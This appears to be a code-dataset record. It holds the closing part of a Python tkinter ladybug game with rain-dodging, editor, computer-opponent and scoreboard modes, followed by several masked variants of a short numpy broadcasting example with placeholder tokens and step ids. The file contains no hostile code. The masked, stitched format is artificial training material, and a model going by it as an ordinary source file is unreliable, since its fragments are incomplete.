data.pause1Drop!=True:data.invincible.append(Invincible(344,0))\r\n if data.pause2Drop!=True:data.invincible.append(Invincible(755,0))\r\n if data.time %90==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.scaryBug.append(ScaryBug(140,750))\r\n data.scaryBug.append(ScaryBug(540,750))\r\n elif side ==\"r\":\r\n data.scaryBug.append(ScaryBug(344,750))\r\n data.scaryBug.append(ScaryBug(755,750))\r\n \r\ndef twoPlayerKeyPressed(event,data):\r\n # controllers for both bugs\r\n if event.keysym == \"r\": init(data)\r\n if data.winner==None:\r\n if (event.keysym == \"a\") and data.onLeft1==False:\r\n data.onLeft1 = True\r\n data.player1X = 150\r\n if(event.keysym == \"d\") and data.onLeft1== True:\r\n data.onLeft1 = False\r\n data.player1X = 330\r\n if (event.keysym == \"Left\") and data.onLeft2==False:\r\n data.onLeft2 = True\r\n data.player2X = 550\r\n if(event.keysym == \"Right\") and data.onLeft2 == True:\r\n data.onLeft2 = False\r\n data.player2X = 750\r\n\r\ndef twoPlayerMousePressed(event, data):\r\n checkHome(event, data)\r\n \r\ndef twoPlayerTimerFired(data):\r\n if data.winner == None:\r\n data.player1Y-=data.speed\r\n #<15 signifies that lady bug reached the top\r\n if data.player1Y < 15 and data.player2Y >15:\r\n data.winner= \"player1\"\r\n if data.player1Y>40:\r\n data.time +=1\r\n drop2Player(data)\r\n data.player2Y-=data.speed\r\n if data.player2Y < 15 and data.player1Y> 15:\r\n data.winner= \"player2\"\r\n if data.player2Y>40:\r\n data.time +=1\r\n drop2Player(data)\r\n if data.player1Y < 15 and data.player2Y <15:\r\n data.winner = \"tie\"\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible:powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug:bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n powerupTimerFired(data)\r\n\r\ndef powerupTimerFired(data):\r\n for coconut in data.coconuts1:\r\n if data.pause1Drop == False:\r\n coconut.onTimerFired(data)\r\n hit2Player(data)\r\n for coconut in data.coconuts2:\r\n if data.pause2Drop == False:\r\n coconut.onTimerFired(data) \r\n if data.start1 != None:\r\n # to make powerups only active for set amount of time\r\n if abs(data.start1-data.player1Y) >= 120:\r\n data.pause1Drop = False\r\n data.Invincible1 = False\r\n if data.start2 != None:\r\n if abs(data.start2-data.player2Y) >= 120:\r\n data.pause2Drop = False\r\n data.Invincible2 = False\r\n \r\n\r\ndef twoPlayerRedrawAll(canvas, data):\r\n #magic #s for placement on screen\r\n canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)\r\n canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)\r\n canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts1: coconut.draw(canvas)\r\n for coconut in data.coconuts2: coconut.draw(canvas)\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\r\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\r\n canvas.create_text(50,40, text = \"Player 1\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n canvas.create_text(450,40, text = \"Player 2\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n winner(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef winner(canvas, data):\r\n if data.winner== \"player1\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! Player 1\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"player2\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! Player 2\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"tie\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"Tie! You Both Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# editor mode\r\n####################################\r\n\r\ndef editorKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef editorMousePressed(event, data):\r\n #check for click on button for your speed\r\n checkHome(event, data)\r\n if data.easyY-data.r<= event.y <= data.easyY +data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.yourSpeed = \"slow\"\r\n data.slow = data.click\r\n data.medium, data.fast = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.yourSpeed = \"medium\"\r\n data.medium = data.click\r\n data.slow, data.fast = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.yourSpeed = \"fast\"\r\n data.fast = data.click\r\n data.slow, data.medium = data.notClick, data.notClick\r\n checkMiddle(event, data)\r\n checkLast(event, data)\r\n\r\ndef checkMiddle(event, data):\r\n #check for click on button for rain speed\r\n if data.medX-data.r<= event.y <= data.medX + data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.rainSpeed = \"drizzle\"\r\n data.drizzle = data.click\r\n data.rain, data.thunderstorm = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.rainSpeed = \"rain\"\r\n data.rain = data.click\r\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.rainSpeed = \"thunderstorm\"\r\n data.thunderstorm = data.click\r\n data.drizzle, data.rain = data.notClick, data.notClick\r\n\r\ndef checkLast(event, data):\r\n #check for click on button for powerups\r\n if data.last-data.r<=event.y<= data.last+data.r:\r\n if data.easyY-2*data.r<= event.x<=data.easyY+2*data.r:\r\n data.powerUpsEditor = True\r\n data.yes, data.no = data.click, data.notClick\r\n if data.last-2*data.r<= event.x<=data.last+2*data.r:\r\n data.powerUpsEditor = False\r\n data.no, data.yes = data.click, data.notClick\r\n if data.enter == data.click:\r\n if data.enterX-data.r<=event.y<=data.enterX+data.r:\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.mode=\"levelCreated\"\r\n \r\n \r\n\r\ndef drawButtons(canvas, data):\r\n #makes each button\r\n data.font, data.fill = \"Helvetica 13 bold\", \"yellow\"\r\n canvas.create_text(data.medX,data.YST, text= \"Your Speed:\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_image(data.easyX,data.easyY, image = data.slow)\r\n canvas.create_text(data.easyX,data.easyY, text=\"Slow\", font = data.font)\r\n canvas.create_image(data.medX,data.easyY, image = data.medium)\r\n canvas.create_text(data.medX,data.easyY, text=\"Medium\", font = data.font)\r\n canvas.create_image(data.hardX,data.easyY, image = data.fast)\r\n canvas.create_text(data.hardX,data.easyY, text=\"Fast\",font = data.font)\r\n canvas.create_image(data.easyX,data.medX, image = data.drizzle)\r\n canvas.create_text(data.medX,data.RST, text= \"Rain Speed:\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_text(data.easyX,data.medX, text=\"Drizzle\",font = data.font)\r\n canvas.create_image(data.medX,data.medX, image = data.rain)\r\n canvas.create_text(data.medX,data.medX, text=\"Rain\",font = data.font)\r\n canvas.create_image(data.hardX,data.medX, image = data.thunderstorm)\r\n canvas.create_text(data.hardX,data.medX, text=\"Heavy\",font = data.font)\r\n canvas.create_text(data.medX,data.PUT, text= \"PowerUps?\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_image(data.easyY,data.last, image = data.yes)\r\n canvas.create_text(data.easyY,data.last, text=\"Yes\",font = data.font)\r\n canvas.create_image(data.last,data.last, image = data.no)\r\n canvas.create_text(data.last,data.last, text=\"No\",font = data.font)\r\n changeEnter(canvas, data)\r\n\r\ndef changeEnter(canvas, data):\r\n #makes it so the enter button respond to click\r\n if data.powerUpsEditor != None and data.yourSpeed != None and \\\r\n data.rainSpeed != None: data.enter = data.click\r\n canvas.create_image(data.medX,data.enterX, image = data.enter)\r\n canvas.create_text(data.medX,data.enterX, text=\"Enter\",font = data.font)\r\n\r\ndef editorTimerFired(data):\r\n data.editorTime += 1\r\n if data.editorTime %2 ==0:\r\n rainDrop(data)\r\n for drop in data.editorDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef rainDrop(data):\r\n #background drops\r\n xPosition = random.randint(0,data.width)\r\n data.editorDrops.append(Coconuts(xPosition,0))\r\n\r\ndef editorRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.height/2, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.S_P -10, text = \"Edit Your Level!\",\r\n font=\"Arial 23 bold\", fill = \"yellow\")\r\n drawButtons(canvas, data)\r\n drawHome(canvas, data)\r\n####################################\r\n# levelCreated mode\r\n####################################\r\ndef setEverything(data):\r\n #customizing game\r\n if data.yourSpeed == \"slow\": data.speed = 6\r\n elif data.yourSpeed == \"medium\": data.speed = 10\r\n elif data.yourSpeed == \"fast\": data.speed = 14\r\n if data.rainSpeed == \"thunderstorm\": data.rSpeed = 7\r\n elif data.rainSpeed == \"rain\": data.rSpeed = 10\r\n elif data.rainSpeed == \"drizzle\": data.rSpeed = 13\r\n \r\n\r\ndef levelCoconutShot(data):\r\n #adding drops\r\n if data.levelEditorLives >0:\r\n if data.time%int(0.35*data.rSpeed) == 0:\r\n xPosition1 = random.randint(0,data.Player1Min-data.buffer)\r\n xPosition2 = random.randint(770, 870)\r\n xPosition3 = random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n data.coconuts.append(Coconuts(xPosition1,0))\r\n data.coconuts.append(Coconuts(xPosition2,0))\r\n if data.time % int(0.55*data.rSpeed) ==0:\r\n xPosition3 = random.randint(0, 220)\r\n xPosition5 = random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n data.coconuts.append(Coconuts(xPosition5,0))\r\n if data.time % int(data.rSpeed) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.coconuts.append(Coconuts(3*data.width/8-20,0))\r\n elif side ==\"r\":\r\n data.coconuts.append(Coconuts(7*data.width/8+40,0))\r\n xPosition4= random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition4,0))\r\n \r\n levelPowerUp(data)\r\n\r\ndef levelPowerUp(data):\r\n # adding power-ups only if clicked yes\r\n if data.powerUpsEditor == True:\r\n if data.time % 20 == 0 and data.time%40 !=0:\r\n Position = random.choice(data.spotList)\r\n data.powerUps.append(PowerUps(Position,0))\r\n if data.time%30 == 0:\r\n Position = random.choice(data.spotList)\r\n data.invincible.append(Invincible(Position,0))\r\n if data.time %35==0:\r\n Position = random.choice(data.spotList)\r\n data.scaryBug.append(ScaryBug(Position,750))\r\n\r\ndef levelCreatedKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n if data.levelEditorLives>0:\r\n if (event.keysym == \"Left\") and data.cx>=317:\r\n data.cx -=(data.lane/2)\r\n elif(event.keysym == \"Right\") and data.cx<=740:\r\n data.cx +=(data.lane/2)\r\n\r\ndef levelCreatedMousePressed(event, data):\r\n checkHome(event, data)\r\n\r\ndef levelCreatedTimerFired(data):\r\n setEverything(data)\r\n if data.levelEditorLives>0:\r\n data.cy-=data.speed\r\n if data.cy < 15:\r\n data.level +=1\r\n if data.cy>40:\r\n data.time +=1\r\n if data.pauseDrops !=True: levelCoconutShot(data)\r\n if data.powerUpsEditor == False:\r\n for coconut in data.coconuts: coconut.onTimerFired(data)\r\n hit(data)\r\n if data.powerUpsEditor == True:\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible: powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug: bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n for coconut in data.coconuts:\r\n if data.pauseDrops == False:coconut.onTimerFired(data)\r\n if data.beInvincible == False: hit(data)\r\n if data.start != None:\r\n #to make powerups only active for set amount of time\r\n if abs(data.start-data.cy) >= 120:\r\n data.pauseDrops, data.beInvincible = False, False\r\n\r\n\r\ndef levelCreatedRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts: coconut.draw(canvas)\r\n if data.powerUpsEditor == True: drawPowerups(canvas, data)\r\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\r\n canvas.create_text(data.width/6,100,\r\n text =\"Total Lives: %d\" %data.levelEditorLives,\r\n font = \"Arial 20 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,660,\r\n text =\"\"\"You lose a life for hitting a drop\r\n & don't get eaten!\"\"\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n if data.levelEditorLives <=0:\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)\r\n canvas.create_text(data.width/2,data.height/4,\r\n text = \"You Lose! Better Luck Next Time!\",\r\n font = \"Helvetica 23 bold\", fill = \"yellow\") \r\n if data.level > 1: winEditor(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef winEditor(canvas, data):\r\n #screen for when you win\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# AI Difficulty Mode\r\n####################################\r\ndef difficultyKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef drawDifficulties(canvas, data):\r\n canvas.create_text(data.medX,data.AITY, text= \"Computer Difficulty:\",\r\n font=\"Arial 23 bold\", fill = \"yellow\") \r\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\r\n canvas.create_text(data.easyX,data.easyY, text=\"Easy\")\r\n canvas.create_image(data.medX, data.easyY, image=data.medium)\r\n canvas.create_text(data.medX,data.easyY, text=\"Medium\")\r\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\r\n canvas.create_text(data.hardX,data.easyY, text=\"Hard\")\r\n if data.difficulty !=None:\r\n data.enter = data.click\r\n canvas.create_image(data.medX, data.enterY, image=data.enter)\r\n canvas.create_text(data.medX,data.enterY, text=\"Enter\")\r\n\r\ndef difficultyMousePressed(event, data):\r\n #sets up buttons to customize\r\n checkHome(event, data)\r\n if data.easyY-data.r<= event.y <= data.easyY +data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.difficulty = data.difS\r\n data.slow = data.click\r\n data.medium, data.fast = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.difficulty = data.difM\r\n data.medium = data.click\r\n data.slow, data.fast = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.difficulty = data.difH\r\n data.fast = data.click\r\n data.slow, data.medium = data.notClick, data.notClick\r\n if data.enter == data.click:\r\n if data.enterY-data.r<=event.y<=data.enterY+data.r:\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.mode=\"AI\"\r\n\r\ndef difficultyTimerFired(data):\r\n # makes normal background rain\r\n data.editorTime += 1\r\n if data.editorTime %2 ==0:\r\n rainDrop(data)\r\n for drop in data.editorDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef rainDrop(data):\r\n xPosition = random.randint(0,data.width)\r\n data.editorDrops.append(Coconuts(xPosition,0))\r\n\r\ndef difficultyRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.height/2, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n drawDifficulties(canvas, data)\r\n drawHome(canvas, data)\r\n\r\n####################################\r\n# AI mode\r\n####################################\r\ndef hitAI1(data, distance):\r\n for coconut in data.coconutsAI1:\r\n # so AI switches by itself\r\n if (data.player1Y-data.r - coconut.y<=distance) and \\\r\n data.switchOnProgress == False:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r or AISwitchBug(data,distance)==True:\r\n testInt = random.randint(0,9)\r\n # to have different levels of difficulty\r\n if testInt<= data.difficulty:\r\n data.switchOnProgress= True\r\n if data.player1X == 150:\r\n data.player1X = 340\r\n else:\r\n data.player1X = 150\r\n data.switchOnProgress= False\r\n if coconut.y>=data.player1Y-data.r and coconut.y<=data.player1Y+data.r:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r:\r\n data.player1Y+=50\r\n data.coconutsAI1.remove(coconut)\r\n\r\ndef AISwitchBug(data, distance):\r\n #AI to move for spider\r\n for scaryBug in data.scaryBug:\r\n if (data.player1Y-data.r - scaryBug.y<=distance) and \\\r\n data.switchOnProgress == False:\r\n if scaryBug.x>=data.player1X-data.r and \\\r\n scaryBug.x<=data.player1X+data.r:\r\n return True\r\n\r\ndef hitAI2(data, distance):\r\n # check if human controlled player hits drops\r\n for coconut in data.coconutsAI2:\r\n if coconut.y>=data.player2Y-data.r and coconut.y<=data.player2Y+data.r:\r\n if coconut.x>=data.player2X-data.r and \\\r\n coconut.x<=data.player2X+data.r:\r\n data.player2Y+=50 \r\n data.coconutsAI2.remove(coconut)\r\n \r\ndef coconutShotAI(data):\r\n if data.winner ==None:\r\n # randomize position of drops off of tree\r\n if data.time%15==0:\r\n xPosition1 = random.randint(0,385)\r\n if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40:\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(xPosition1,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(xPosition1 +410,0))\r\n if data.time%8 ==0:\r\n xPosition2 = random.randint(0,80)\r\n xPosition3 = random.randint(364, 385)\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(xPosition2,0))\r\n data.coconutsAI1.append(Coconuts(xPosition3,0)) \r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(xPosition2+410,0))\r\n data.coconutsAI2.append(Coconuts(xPosition3+410,0))\r\n addExtraCoconut(data)\r\n addPowerUpsAI(data)\r\n\r\ndef addExtraCoconut(data):\r\n #adds drops to edges of trees\r\n if data.time % (18) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(140,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.coconutsAI1.append(Coconuts(344,0))\r\n if data.pause2Drop != True:\r\n data.coconutsAI2.append(Coconuts(755,0))\r\n if data.time % 37 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.powerUps.append(PowerUps(140,0))\r\n if data.pause2Drop != True:\r\n data.powerUps.append(PowerUps(550,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.powerUps.append(PowerUps(344,0))\r\n if data.pause2Drop != True:\r\n data.powerUps.append(PowerUps(755,0))\r\n \r\ndef addPowerUpsAI(data):\r\n #randomly add powerups on tree\r\n if data.time%33 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.invincible.append(Invincible(140,0))\r\n if data.pause2Drop != True:\r\n data.invincible.append(Invincible(550,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop != True:\r\n data.invincible.append(Invincible(344,0))\r\n if data.pause2Drop != True:\r\n data.invincible.append(Invincible(755,0))\r\n if data.time %66==0:\r\n side = random.choice(data.sides) \r\n if side == \"l\":\r\n data.scaryBug.append(ScaryBug(140,750))\r\n data.scaryBug.append(ScaryBug(550,750))\r\n elif side ==\"r\":\r\n data.scaryBug.append(ScaryBug(344,750))\r\n data.scaryBug.append(ScaryBug(750,750))\r\n\r\n \r\ndef AIKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n if data.winner==None:\r\n if (event.keysym == \"Left\") and data.onLeft1==False:\r\n data.onLeft1 = True\r\n data.player2X = 550\r\n elif(event.keysym == \"Right\") and data.onLeft1== True:\r\n data.onLeft1 = False\r\n data.player2X = 750\r\n\r\ndef AIMousePressed(event, data): checkHome(event, data)\r\ndef AITimerFired(data):\r\n if data.winner == None:\r\n #want to check hit twice (before & after elements move)\r\n if data.Invincible1 == False:hitAI1(data, 31)\r\n if data.Invincible2 == True: pass\r\n elif data.Invincible2 == False:hitAI2(data, 31)\r\n for coconut in data.coconutsAI1:\r\n if data.pause1Drop == False:coconut.onTimerFired(data)\r\n for coconut in data.coconutsAI2:\r\n if data.pause2Drop == False:coconut.onTimerFired(data)\r\n # second check\r\n if data.Invincible1 == False:hitAI1(data,13)\r\n if data.Invincible2 == True:pass\r\n elif data.Invincible2 == False:hitAI2(data,13)\r\n data.player1Y-=data.speedAI\r\n #establishing winer\r\n if data.player1Y < 15 and data.player2Y >15: data.winner= \"player1\"\r\n if data.player1Y>40:\r\n data.time +=1\r\n coconutShotAI(data)\r\n data.player2Y-=data.speedAI\r\n if data.player2Y < 15 and data.player1Y> 15: data.winner= \"player2\" \r\n if data.player2Y>40:\r\n data.time +=1\r\n coconutShotAI(data)\r\n if data.player1Y < 15 and data.player2Y <15: data.winner = \"tie\"\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n powerUpAITimerFired(data)\r\n\r\ndef powerUpAITimerFired(data):\r\n #moves both sides symmetrically \r\n for powerUp in data.invincible:\r\n powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug:\r\n bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n if data.start1 != None:\r\n if abs(data.start1-data.player1Y) >= 120:\r\n data.pause1Drop = False\r\n data.Invincible1 = False\r\n if data.start2 != None:\r\n if abs(data.start2-data.player2Y) >= 120:\r\n data.pause2Drop = False\r\n data.Invincible2 = False\r\n \r\n\r\n\r\ndef AIRedrawAll(canvas, data):\r\n canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)\r\n canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)\r\n canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconutsAI1:\r\n coconut.draw(canvas)\r\n for coconut in data.coconutsAI2:\r\n coconut.draw(canvas)\r\n canvas.create_text(50,40, text = \"Computer\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n canvas.create_text(450,40, text = \"Player 1\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\r\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\r\n AIWinner(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef AIWinner(canvas, data):\r\n if data.winner== \"player1\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"The Computer Won :(\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"player2\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! You Won!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"tie\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"Tie! You Both Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n####################################\r\n# ScoreBoard mode\r\n####################################\r\n\r\ndef scoreboardKeyPressed(event, data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef scoreboardMousePressed(event, data): checkHome(event, data)\r\n\r\ndef scoreboardTimerFired(data):\r\n difficultyTimerFired(data)\r\n\r\ndef scoreboardRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.tbgY, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.txtTScore, text=\"Top Scores!\",\r\n font = \"Arial 30 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2, data.S_P, text=\"Score_Player\",\r\n font = \"Arial 20 bold\", fill = \"yellow\")\r\n drawHome(canvas, data)\r\n #reads file\r\n data.savedScores\r\n data.savedScores=readFile(\"score.txt\")\r\n score=data.savedScores.splitlines()\r\n scores=[]\r\n for line in score:\r\n scores.append(line.split(\",\"))\r\n #sorts scores to find top 5\r\n scores = sorted(scores, key = lambda x: int(x[0]))\r\n top5 = scores[-data.numScores:]\r\n top5.reverse()\r\n for i in range(len(top5)):\r\n canvas.create_text(data.width/2, data.scoreShift+(i*50),\r\n text = top5[i],\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# help mode\r\n####################################\r\n\r\ndef helpKeyPressed(event, data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef helpMousePressed(event, data): checkHome(event, data)\r\n\r\ndef helpTimerFired(data):\r\n difficultyTimerFired(data)\r\n\r\ndef helpRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.helpY, image=data.helpScreen)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n drawHome(canvas, data)\r\n\r\n#######################################\r\n# use the run function as-is from notes\r\n#######################################\r\n\r\ndef run(width=15000, height=25000):\r\n def redrawAllWrapper(canvas, data):\r\n canvas.delete(ALL)\r\n redrawAll(canvas, data)\r\n canvas.update() \r\n\r\n def mousePressedWrapper(event, canvas, data):\r\n mousePressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def keyPressedWrapper(event, canvas, data):\r\n keyPressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def timerFiredWrapper(canvas, data):\r\n timerFired(data)\r\n redrawAllWrapper(canvas, data)\r\n # pause, then call timerFired again\r\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\r\n # Set up data and call init\r\n class Struct(object): pass\r\n data = Struct()\r\n data.width = width\r\n data.height = height\r\n data.timerDelay = 100 # milliseconds\r\n # create the root and the canvas\r\n root = Tk()\r\n init(data)\r\n canvas = Canvas(root, width=data.width, height=data.height)\r\n canvas.pack()\r\n # set up events\r\n root.bind(\"<Button-1>\", lambda event:\r\n mousePressedWrapper(event, canvas, data))\r\n root.bind(\"<Key>\", lambda event:\r\n keyPressedWrapper(event, canvas, data))\r\n timerFiredWrapper(canvas, data)\r\n # and launch the app\r\n root.mainloop() # blocks until window is closed\r\n print(\"bye!\")\r\n\r\nrun(1000, 1000)\r\n",
"step-ids": [
66,
79,
82,
95,
104
]
}
|
[
66,
79,
82,
95,
104
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(3):
for j in range(4):
c[i][j] = a[i][j] + b[j]
print(c)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
a = np.ones((3, 4))
b = np.ones((4, 1))
c = np.zeros_like(a)
for i in range(3):
for j in range(4):
c[i][j] = a[i][j] + b[j]
print(c)
d = a + b.T
print(d)
<|reserved_special_token_1|>
import numpy as np
a = np.ones((3, 4))
b = np.ones((4, 1))
c = np.zeros_like(a)
for i in range(3):
for j in range(4):
c[i][j] = a[i][j] + b[j]
print(c)
d = a + b.T
print(d)
<|reserved_special_token_1|>
import numpy as np
a = np.ones((3,4))
b = np.ones((4,1))
# a.shape = (3,4)
# b.shape = (4,1)
c = np.zeros_like(a)
for i in range(3):
for j in range(4):
c[i][j] = a[i][j] + b[j]
print(c)
d = a+b.T
print(d)
|
flexible
|
{
"blob_id": "d6213698423902771011caf6b5206dd4e3b27450",
"index": 5753,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(3):\n for j in range(4):\n c[i][j] = a[i][j] + b[j]\nprint(c)\n<mask token>\nprint(d)\n",
"step-3": "<mask token>\na = np.ones((3, 4))\nb = np.ones((4, 1))\nc = np.zeros_like(a)\nfor i in range(3):\n for j in range(4):\n c[i][j] = a[i][j] + b[j]\nprint(c)\nd = a + b.T\nprint(d)\n",
"step-4": "import numpy as np\na = np.ones((3, 4))\nb = np.ones((4, 1))\nc = np.zeros_like(a)\nfor i in range(3):\n for j in range(4):\n c[i][j] = a[i][j] + b[j]\nprint(c)\nd = a + b.T\nprint(d)\n",
